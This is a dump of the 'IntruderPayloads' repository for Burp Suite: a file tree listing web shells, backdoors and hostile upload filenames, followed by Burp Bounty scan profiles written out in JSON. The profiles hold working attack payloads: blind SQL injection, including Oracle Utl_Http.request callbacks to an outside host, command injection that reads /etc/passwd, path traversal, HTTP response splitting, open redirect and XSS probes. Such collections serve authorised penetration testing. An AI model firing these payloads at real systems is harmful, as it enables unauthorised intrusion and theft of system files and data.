├── BurpAttacks
    ├── 01_burpattack_basic_methods
    ├── 01_burpattack_dirbuster
    ├── 01_burpattack_dirbuster_toplist
    ├── 01_burpattack_fast_fuzz
    ├── 02_burpattack_vulnerabilities_all
    ├── 03_burpattack_find_inject
    ├── 03_burpattack_find_injectx
    ├── 04_burpattack_basic_fuzz
    ├── 04_burpattack_sqli_quick_fuzz
    ├── 05_burpattack_full_fuzz
    ├── burp_config
    ├── burpattack_basic_auth_brute
    ├── burpattack_brute_force
    ├── burpattack_command_exec
    ├── burpattack_find_injectx
    ├── burpattack_nums_1-100
    ├── burpattack_overflow
    ├── burpattack_server_side_include
    ├── burpattack_shellshock
    ├── burpattack_sqli_authbypass
    ├── burpattack_sqli_error_based
    ├── burpattack_sqli_quick_fuzz
    ├── burpattack_sqli_time_based
    ├── burpattack_url_attacks
    ├── burpattack_wordpress
    ├── burpattack_xmlrpc_dos
    ├── burpattack_xpath_injection
    ├── burpattack_xss
    ├── burpattack_xss_stored
    ├── burpattack_xxe
    ├── burpconfig_default
    ├── burprepeater_xxe
    └── shellshock_attack
├── BurpBountyPayloads
    ├── ACTIVE - HTTP Interaction.bb
    ├── ACTIVE - HTTP Response Splitting.bb
    ├── ACTIVE - Open Redirect.bb
    ├── ACTIVE - Reflected Values.bb
    ├── ACTIVE - Remote Code Execution.bb
    ├── ACTIVE - SQL Injection (Blind).bb
    ├── ACTIVE - SQL Injection (Error).bb
    ├── ACTIVE - Traversal.bb
    ├── ACTIVE - XSS.bb
    ├── PASSIVE - Basic Auth Check.bb
    ├── PASSIVE - CMS Detection.bb
    ├── PASSIVE - Cisco ASA Device Found.bb
    ├── PASSIVE - Credentials Found.bb
    ├── PASSIVE - Forgot Password Form.bb
    ├── PASSIVE - Form Submission Found.bb
    ├── PASSIVE - Interesting Pages.bb
    ├── PASSIVE - Java De-Serialization.bb
    ├── PASSIVE - Jenkins Found.bb
    ├── PASSIVE - Login Page Found.bb
    ├── PASSIVE - Private Key Found.bb
    ├── PASSIVE - Redirect Found.bb
    ├── PASSIVE - Registration Page Found.bb
    ├── PASSIVE - Session Found.bb
    ├── PASSIVE - Subscribe Form Found.bb
    ├── PASSIVE - Token Found.bb
    ├── PASSIVE - Version Disclosure.bb
    └── PASSIVE - WAF Found.bb
├── BurpsuiteIntruderPayloads.png
├── FuzzLists
    ├── auth_bypass.txt
    ├── bad_chars.txt
    ├── basic_fuzz.txt
    ├── command_exec.txt
    ├── dirbuster-cgi.txt
    ├── dirbuster-dirs.txt
    ├── dirbuster-quick.txt
    ├── dirbuster-top1000.txt
    ├── full_fuzz.txt
    ├── grep_injectx.txt
    ├── lfi.txt
    ├── overflow-dos.txt
    ├── overflow.txt
    ├── passwords_long.txt
    ├── passwords_medium.txt
    ├── passwords_quick.txt
    ├── payload_injectx.txt
    ├── quick_fuzz.txt
    ├── sqli-error-based.txt
    ├── sqli-time-based.txt
    ├── sqli-union-select.txt
    ├── sqli_escape_chars.txt
    ├── ssi_quick.txt
    ├── toplist-sorted.txt
    ├── traversal-short.txt
    ├── traversal.txt
    ├── url_payloads.txt
    ├── usernames.txt
    ├── vulnerability_discovery.txt
    ├── xml-attacks.txt
    ├── xss_escape_chars.txt
    ├── xss_find_inject.txt
    ├── xss_funny_stored.txt
    ├── xss_grep.txt
    ├── xss_payloads_quick.txt
    ├── xss_remote_payloads-http.txt
    ├── xss_remote_payloads-https.txt
    └── xss_swf_fuzz.txt
├── OWASPTestingChecklist_v_1.0.xls
├── Plugins
    ├── BurpKit-1.02-pre.jar
    ├── jruby-complete-9.0.0.0.jar
    └── jython-standalone-2.7.0.jar
├── README.md
├── Uploads
    ├── "
    ├── " --
    ├── "><iframe src=" javascript:alert('XSS');">.jpg
    ├── "><iframe src=" javascript:alert('XSS');">.xml
    ├── "><img onload=prompt(1)>.cfg
    ├── "><img onload=prompt(1)>.csv
    ├── "><img onload=prompt(1)>.docx
    ├── "><img onload=prompt(1)>.img
    ├── "><img onload=prompt(1)>.torrent
    ├── "><img onload=prompt(1)>.zip
    ├── "><img onload=prompt(1)>2.csv
    ├── "><img onload=prompt(1)>2.docx
    ├── "><img src=x onload=prompt(1)>.jpg
    ├── "><svg onload=alert(1)>.jpg
    ├── %00';alert(1);.jpg
    ├── %00';alert(2);.jpg
    ├── %001.jpg
    ├── %0011.jpg
    ├── %0a';alert(1);.jpg
    ├── %0a';alert(2);.jpg
    ├── %0a1.jpg
    ├── %1.jpg
    ├── %22%3E%3Csvg%20onload%3Dalert(1)%3E%00.png
    ├── %22%3E%3Csvg%20onload%3Dalert(1)%3E%0a%0f.png
    ├── %22%3E%3Csvg%20onload%3Dalert(1)%3E%0a.png
    ├── %22%3E%3Csvg%20onload%3Dalert(1)%3E.png
    ├── %22__img src=x onerror=prompt(1)_.jpg
    ├── %22onerror=%22alert(1)%22a=%22.jpg
    ├── %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00%0d%0a\n;`whoami`'"--.png
    ├── ' having 1=1
    ├── '" --
    ├── '+alert(1)+'.jpg
    ├── '.swf
    ├── ';alert(1);x='.jpg
    ├── .zip
    ├── 1N3.jpg
    ├── 1N3.php
    ├── 1N3.php\x00.csv
    ├── 1N3.php\x00.jpg
    ├── 404.php.jpg
    ├── <h1>INJECTX.jpg
    ├── <hr>test<hr>
    ├── <img
    ├── <img onload=prompt(1)>.csv
    ├── <img src="c" onerror=alert(1)>
    ├── BillionLaughs.txt
    ├── Desktop.rar
    ├── EventsSources.xml
    ├── Link to svg-xss-xml.svg
    ├── ProxyTarget.xml
    ├── Service.xml
    ├── Sun'><img src=x onerror=alert(1)>set.jpg
    ├── Sun'__img src=x onerror=alert(1)_set.jpg
    ├── \';alert\(XSS\);x=\'
    ├── alt-extensions-asp.txt
    ├── alt-extensions-coldfusion.txt
    ├── alt-extensions-jsp.txt
    ├── alt-extensions-perl.txt
    ├── alt-extensions-php.txt
    ├── download.gif
    ├── evil-xxe.docx
    ├── exifremover.jpg
    ├── exploit.jpg
    ├── exploit.mvg
    ├── exploit.png
    ├── exploit.svg
    ├── file-ul-filter-bypass-commonly-writable-directories.txt
    ├── file-ul-filter-bypass-microsoft-asp-filetype-bf.txt
    ├── file-ul-filter-bypass-microsoft-asp.txt
    ├── file-ul-filter-bypass-ms-php.txt
    ├── file-ul-filter-bypass-x-platform-generic.txt
    ├── file-ul-filter-bypass-x-platform-php.txt
    ├── file-ul-filter-bypass.readme
    ├── gifshell.php.gif
    ├── hithere.php.jpg
    ├── image%00.jpg
    ├── image.jpg
    ├── image.php
    ├── image_upload_test.rar
    ├── import_csv_template.csv
    ├── import_csv_template2.csv
    ├── invalid-filenames-linux.txt
    ├── invalid-filenames-microsoft.txt
    ├── invalid-filesystem-chars-microsoft.txt
    ├── invalid-filesystem-chars-osx.txt
    ├── jaja.php.orionn.gif
    ├── jpeg.php%00.jpg
    ├── jpeg.php.jpg
    ├── jpeg
    │   └── test.jpeg
    ├── kos`uname`oss.jpg
    ├── loading.gif
    ├── mp4
    │   ├── 1.mp4
    │   └── mp4uploadtext.txt
    ├── mvg_read.mvg
    ├── mvg_ssrf.mvg
    ├── onerror=alert('XSS')' a='.jpg
    ├── passwd
    ├── passwd.zip
    ├── php-backdoor.docx
    ├── php-backdoor.jpg
    ├── php-backdoor.php
    ├── php-backdoor.php%00.jpg
    ├── php-backdoor.php.jpg
    ├── phpinfo.jpg
    ├── phpinfo.php.gif
    ├── phppng.png
    ├── png
    │   └── image.php.png
    ├── publications.opml
    ├── pwnd.php.jpg
    ├── rce.php.jpg
    ├── rce2.php.jpg
    ├── shell.php;.jpg
    ├── shell.png
    ├── shell2.php;.jpg
    ├── simple-backdoor.php
    ├── simple-backdoor.php.gif
    ├── simple-backdoor2.php.gif
    ├── ssrf.jpg
    ├── ssrf.mvg
    ├── ssrf.png
    ├── svg-xss-xml.svg
    ├── swf
    │   ├── test.html
    │   └── xssproject.swf
    ├── uploads.csv
    ├── weevely_shell.php
    ├── white_hat%0a.png
    ├── xss.html\x00.jpg
    ├── xsspng.png
    ├── xsspng.png\x00.csv
    ├── |ls
    ├── |ls%20-al
    └── || cat %2fetc%2fpasswd;test.jpg
├── install.sh
└── update.sh


/BurpAttacks/01_burpattack_basic_methods:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/01_burpattack_basic_methods


--------------------------------------------------------------------------------
/BurpAttacks/01_burpattack_dirbuster:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/01_burpattack_dirbuster


--------------------------------------------------------------------------------
/BurpAttacks/01_burpattack_dirbuster_toplist:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/01_burpattack_dirbuster_toplist


--------------------------------------------------------------------------------
/BurpAttacks/01_burpattack_fast_fuzz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/01_burpattack_fast_fuzz


--------------------------------------------------------------------------------
/BurpAttacks/02_burpattack_vulnerabilities_all:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/02_burpattack_vulnerabilities_all


--------------------------------------------------------------------------------
/BurpAttacks/03_burpattack_find_inject:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/03_burpattack_find_inject


--------------------------------------------------------------------------------
/BurpAttacks/03_burpattack_find_injectx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/03_burpattack_find_injectx


--------------------------------------------------------------------------------
/BurpAttacks/04_burpattack_basic_fuzz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/04_burpattack_basic_fuzz


--------------------------------------------------------------------------------
/BurpAttacks/04_burpattack_sqli_quick_fuzz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/04_burpattack_sqli_quick_fuzz


--------------------------------------------------------------------------------
/BurpAttacks/05_burpattack_full_fuzz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/05_burpattack_full_fuzz


--------------------------------------------------------------------------------
/BurpAttacks/burp_config:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burp_config


--------------------------------------------------------------------------------
/BurpAttacks/burpattack_basic_auth_brute:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpattack_basic_auth_brute


--------------------------------------------------------------------------------
/BurpAttacks/burpattack_brute_force:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpattack_brute_force


--------------------------------------------------------------------------------
/BurpAttacks/burpattack_command_exec:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpattack_command_exec


--------------------------------------------------------------------------------
/BurpAttacks/burpattack_find_injectx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpattack_find_injectx


--------------------------------------------------------------------------------
/BurpAttacks/burpattack_nums_1-100:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpattack_nums_1-100


--------------------------------------------------------------------------------
/BurpAttacks/burpattack_overflow:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpattack_overflow


--------------------------------------------------------------------------------
/BurpAttacks/burpattack_server_side_include:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpattack_server_side_include


--------------------------------------------------------------------------------
/BurpAttacks/burpattack_shellshock:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpattack_shellshock


--------------------------------------------------------------------------------
/BurpAttacks/burpattack_sqli_authbypass:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpattack_sqli_authbypass


--------------------------------------------------------------------------------
/BurpAttacks/burpattack_sqli_error_based:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpattack_sqli_error_based


--------------------------------------------------------------------------------
/BurpAttacks/burpattack_sqli_quick_fuzz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpattack_sqli_quick_fuzz


--------------------------------------------------------------------------------
/BurpAttacks/burpattack_sqli_time_based:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpattack_sqli_time_based


--------------------------------------------------------------------------------
/BurpAttacks/burpattack_url_attacks:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpattack_url_attacks


--------------------------------------------------------------------------------
/BurpAttacks/burpattack_wordpress:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpattack_wordpress


--------------------------------------------------------------------------------
/BurpAttacks/burpattack_xmlrpc_dos:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpattack_xmlrpc_dos


--------------------------------------------------------------------------------
/BurpAttacks/burpattack_xpath_injection:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpattack_xpath_injection


--------------------------------------------------------------------------------
/BurpAttacks/burpattack_xss:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpattack_xss


--------------------------------------------------------------------------------
/BurpAttacks/burpattack_xss_stored:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpattack_xss_stored


--------------------------------------------------------------------------------
/BurpAttacks/burpattack_xxe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpattack_xxe


--------------------------------------------------------------------------------
/BurpAttacks/burpconfig_default:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/burpconfig_default


--------------------------------------------------------------------------------
/BurpAttacks/shellshock_attack:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpAttacks/shellshock_attack


--------------------------------------------------------------------------------
/BurpBountyPayloads/ACTIVE - HTTP Interaction.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"ACTIVE - HTTP Interaction","Active":true,"Scanner":1,"Payloads":["INJECTX.burpcollaborator.net","http://INJECTX.burpcollaborator.net","https://INJECTX.burpcollaborator.net","//INJECTX.burpcollaborator.net"],"Encoder":["URL-encode key characters"],"UrlEncode":true,"CharsToUrlEncode":"\" ?\u0026","Grep":["Burp Collaborator Server"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"rCookies":false,"spaceEncode":false,"payloadPosition":1,"sEncode":"","payloadsFile":"","grepsFile":"","IssueName":"HTTP Interaction","IssueSeverity":"Medium","IssueConfidence":"Tentative","IssueDetail":"HTTP Interaction","RemediationDetail":"HTTP Interaction","IssueBackground":"HTTP Interaction","RemediationBackground":"HTTP Interaction"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/ACTIVE - HTTP Response Splitting.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"ACTIVE - HTTP Response Splitting","Active":true,"Scanner":1,"Payloads":["INJECTX%0d%0aSet-Cookie:INJECTX123;%0d%0a","INJECTX%0aSet-Cookie:INJECTX123;%0a","INJECTX\\u{0120}HTTP/1.1\\u{010D}\\u{010A}Host:\\u{0120}crowdshield.com\\u{010D}\\u{010A}\\u{010D}\\u{010A}GET\\u{0120}/.injectx/r.php?http_split"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Set-Cookie: INJECTX123","Set-Cookie:INJECTX123"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":1,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":1,"sEncode":"","payloadsFile":"","grepsFile":"","IssueName":"HTTP Response Splitting","IssueSeverity":"Medium","IssueConfidence":"Tentative","IssueDetail":"HTTP Response Splitting","RemediationDetail":"HTTP Response Splitting","IssueBackground":"HTTP Response Splitting","RemediationBackground":"HTTP Response Splitting"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/ACTIVE - Open Redirect.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"ACTIVE - Open Redirect (Firm)","Active":true,"Scanner":1,"Payloads":["https://sn1persecurity.com"],"Encoder":["URL-encode key characters"],"UrlEncode":true,"CharsToUrlEncode":" ?\u0026#:/\\","Grep":["Location: https://sn1persecurity.com","\u003cmeta http-equiv"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"rCookies":false,"spaceEncode":false,"payloadPosition":1,"sEncode":"","payloadsFile":"","grepsFile":"","IssueName":"Open Redirect (Firm)","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Open Redirect (Firm)","RemediationDetail":"Open Redirect (Firm)","IssueBackground":"Open Redirect (Firm)","RemediationBackground":"Open Redirect (Firm)"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/ACTIVE - Reflected Values.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"ACTIVE - Reflected Values Found","Active":true,"Scanner":1,"Payloads":["INJECTX"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["INJECTX"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":true,"ResponseCode":"200","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Reflected Values","IssueSeverity":"Low","IssueConfidence":"Certain","IssueDetail":"Reflected Values","RemediationDetail":"Reflected Values","IssueBackground":"Reflected Values","RemediationBackground":"Reflected Values"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/ACTIVE - Remote Code Execution.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"ACTIVE - Remote Code Execution","Active":true,"Scanner":1,"Payloads":["phpinfo()","a\u003de; b\u003dt; c\u003dc; d\u003dp; e\u003da; f\u003ds; g\u003dw; h\u003dd; cat /$a$b$c/$d$e$f$f$g$h","data://text/plain;base64,cGhwaW5mbygpCg\u003d\u003d","php://filter/convert.base64-encode/resource\u003d/etc/passwd",";cat$u+/etc$u/passwd$u","sleep 5","$(sleep 5)","INJECTX;sleep 5","INJECTX;sleep 5","INJECTX|sleep 5","INJECTX||sleep 5","INJECTX \u0026\u0026 sleep 5","INJECTX|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\u0027 |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\\\" |ping -n 21 127.0.0.1 "],"Encoder":["URL-encode key characters"],"UrlEncode":true,"CharsToUrlEncode":" \u0026?\"\u003d#","Grep":["$_SERVER","Registered Stream Filters ","INJECTX123","root:x:"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":1,"sEncode":"","payloadsFile":"","grepsFile":"","IssueName":"RCE","IssueSeverity":"High","IssueConfidence":"Tentative","IssueDetail":"RCE","RemediationDetail":"RCE","IssueBackground":"RCE","RemediationBackground":"RCE"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/ACTIVE - SQL Injection (Blind).bb:
--------------------------------------------------------------------------------
1 | [{"Name":"ACTIVE - SQL Injection (Blind)","Active":true,"Scanner":1,"Payloads":["\u0027 OR SLEEP(5)--","1\u0027 OR SLEEP(5)--","x\u0027 OR SLEEP(5)--","1\" OR SLEEP(5)--","x\u0027 waitfor delay \u00270:0:10\u0027--","1 waitfor delay \u00270:0:10\u0027--","1||Utl_Http.request(\u0027https://crowdshield.com/.injectx/r.php?sqli\u0027) from dual--","1\u0027||Utl_Http.request(\u0027https://crowdshield.com/.injectx/r.php?sqli\u0027) from dual--","1\u0027) AND SLEEP(5) AND (\u0027x\u0027\u003d\u0027x","1\") AND SLEEP(5) AND (\"x\"\u003d\"x","1 AND SLEEP(5)","x AND SLEEP(5)","1 AND waitfor delay \u00270:0:10\u0027","X AND waitfor delay \u00270:0:10\u0027","(select*from(select(sleep(20)))a)","1-sleep/*f*/(10)","1-if(mid(version/*f*/(),1,1)\u003d5,sleep/*f*/(5),0)","1-if(mid(version/*f*/(),1,1)\u003d4,sleep/*f*/(5),0)","1\u0027+AND+SLEEP(5)+AND+\u0027aaxA\u0027\u003d\u0027aaxA","test\u0027 RLIKE (SELECT (CASE WHEN (9203\u003d9203) THEN 0x74657374 ELSE 0x28 END))-- YOJb"],"Encoder":["URL-encode key characters"],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["INJECTX321"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"rCookies":false,"spaceEncode":true,"payloadPosition":1,"sEncode":"+","payloadsFile":"","grepsFile":"","IssueName":"SQL Injection (Blind Based)","IssueSeverity":"High","IssueConfidence":"Tentative","IssueDetail":"SQL Injection (Blind Based)","RemediationDetail":"SQL Injection (Blind Based)","IssueBackground":"SQL Injection (Blind Based)","RemediationBackground":"SQL Injection (Blind Based)"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/ACTIVE - SQL Injection (Error).bb:
--------------------------------------------------------------------------------
1 | [{"Name":"ACTIVE - SQL Injection","Active":true,"Scanner":1,"Payloads":["\u0027","\""],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Incorrect syntax near","SQL syntax","ORA-"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":true,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"rCookies":false,"spaceEncode":false,"payloadPosition":1,"sEncode":"","payloadsFile":"","grepsFile":"","IssueName":"SQL Injection","IssueSeverity":"High","IssueConfidence":"Tentative","IssueDetail":"SQL Injection","RemediationDetail":"SQL Injection","IssueBackground":"SQL Injection","RemediationBackground":"SQL Injection"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/ACTIVE - Traversal.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"ACTIVE - Traversal","Active":true,"Scanner":1,"Payloads":["..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini","../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd","/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/","/mnt/././../etc/././passwd","/etc/.\\/\\/\\/\\/\\/passwd","/etc/.\\/.\\/.\\/.\\/passwd","/\\e\\t\\c/passwd","/et$\u0027c/pa\\u0000/notexist/path\u0027sswd","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/ %uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/ %uff0e%uff0e/etc/passwd","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/winnt/win.ini","\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00test.htm"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["for 16-bit app support","root:x:","boot loader"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"rCookies":false,"spaceEncode":false,"payloadPosition":1,"sEncode":"","payloadsFile":"","grepsFile":"","IssueName":"Traversal","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Traversal","RemediationDetail":"Traversal","IssueBackground":"Traversal","RemediationBackground":"Traversal"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/ACTIVE - XSS.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"ACTIVE - XSS","Active":true,"Scanner":1,"Payloads":["\u003c/INJECTX\u003e(1)","\"\u003e\u003c/INJECTX\u003e(1)"],"Encoder":["URL-encode key characters"],"UrlEncode":true,"CharsToUrlEncode":" \"\u003d?\u0026#","Grep":["\u003c/INJECTX\u003e(1)","\"\u003e\u003c/INJECTX\u003e(1)\u003e"],"PayloadResponse":false,"NotResponse":false,"NotCookie":true,"CaseSensitive":false,"ExcludeHTTP":true,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":true,"ResponseCode":"200","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"rCookies":false,"spaceEncode":false,"payloadPosition":1,"sEncode":"","payloadsFile":"","grepsFile":"","IssueName":"XSS","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"XSS","RemediationDetail":"XSS","IssueBackground":"XSS","RemediationBackground":"XSS"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/PASSIVE - Basic Auth Check.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"PASSIVE - Basic Auth Enabled","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["WWW-Authenticate","Basic realm"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Basic Auth Check","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Basic Auth Check","RemediationDetail":"Basic Auth Check","IssueBackground":"Basic Auth Check","RemediationBackground":"Basic Auth Check"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/PASSIVE - CMS Detection.bb:
--------------------------------------------------------------------------------
